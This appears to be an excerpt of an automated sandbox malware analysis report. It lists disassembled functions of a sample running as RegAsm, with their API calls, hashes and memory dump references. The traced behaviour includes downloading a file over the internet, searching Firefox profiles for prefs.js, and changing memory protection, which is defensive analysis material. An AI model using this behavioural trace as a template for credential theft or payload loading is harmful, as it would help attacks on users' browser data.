                                                                                    • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                    • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                                    • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                    • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                                    Function 6CC33060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC33095
                                                                                      • Part of subcall function 6CC335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                                      • Part of subcall function 6CC335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                                      • Part of subcall function 6CC335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                                      • Part of subcall function 6CC335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                                      • Part of subcall function 6CC335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                                      • Part of subcall function 6CC335A0: __aulldiv.LIBCMT ref: 6CC336E4
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3309F
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC330BE
                                                                                      • Part of subcall function 6CC330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC33127
                                                                                      • Part of subcall function 6CC330F0: __aulldiv.LIBCMT ref: 6CC33140
                                                                                      • Part of subcall function 6CC6AB2A: __onexit.LIBCMT ref: 6CC6AB30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                    • String ID:
                                                                                    • API String ID: 4291168024-0
                                                                                    • Opcode ID: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                                    • Instruction ID: 4138aa6dcedeec23922773e152800c6dd72218e3c0fb0f0fc5209c502e6b804a
                                                                                    • Opcode Fuzzy Hash: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                                    • Instruction Fuzzy Hash: 70F02D2AE207499BCB10DFB899811E67374AF6B114F501319EC8853711FF30A1D983C9
                                                                                    Function 00411EB8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                      • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                      • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                      • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                      • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                      • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                      • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                    • String ID: B
                                                                                    • API String ID: 1244342732-1255198513
                                                                                    • Opcode ID: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                                    • Instruction ID: ca3b8767cd7f053f48781c5f7d31f618261e7555551c60cb52e9541aca8074f8
                                                                                    • Opcode Fuzzy Hash: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                                    • Instruction Fuzzy Hash: 49529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                                    Function 0040B8AF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                    • String ID: \..\
                                                                                    • API String ID: 271224408-4220915743
                                                                                    • Opcode ID: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                                    • Instruction ID: d1c5d3571bf2dc713ef600a72c9e8dce1a4866c2c46e34e82ec1ac83aff49398
                                                                                    • Opcode Fuzzy Hash: f86a2bfd5b95d5ce54e47b1d76212992246169cb21603bc030c522c566867405
                                                                                    • Instruction Fuzzy Hash: BEA17EB1900288AACB14FBE5D516BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                                    Function 00405E09 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (@
                                                                                    • API String ID: 0-1346038526
                                                                                    • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                                    • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                                    Function 00405D69 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-3916222277
                                                                                    • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                    • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                    Function 00410D21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPathlstrcpy
                                                                                    • String ID: ;\B
                                                                                    • API String ID: 1699248803-1503912327
                                                                                    • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                    • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                    • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                    Function 00411250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileOperation
                                                                                    • String ID: ^qA
                                                                                    • API String ID: 3080627654-2929517337
                                                                                    • Opcode ID: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                    • Instruction ID: 1eaf247a329aa75c86d9425b1c51e37de0b4722cea675766f58cecf8dc0fcae1
                                                                                    • Opcode Fuzzy Hash: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                    • Instruction Fuzzy Hash: 68E075B0E0421D9FCB44EFA4D5466EEBBF8FF48308F40806AD919F7240E7B456458BA9
                                                                                    Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentProfile
                                                                                    • String ID: Unknown
                                                                                    • API String ID: 2104809126-1654365787
                                                                                    • Opcode ID: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                    • Instruction ID: 7df7fbcbbed776e4458085ee5b54356bf3053a549426d159850edd6d89fd8832
                                                                                    • Opcode Fuzzy Hash: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                    • Instruction Fuzzy Hash: D6E0C270A0010DFBDB10EBA4DA85FDD37BC6B04348F508125A601E3180DBBCE648CBA9
                                                                                    Function 00410CDD Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFileH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3244726999-0
                                                                                    • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                    • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                    Function 00405A53 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                    • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                    Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
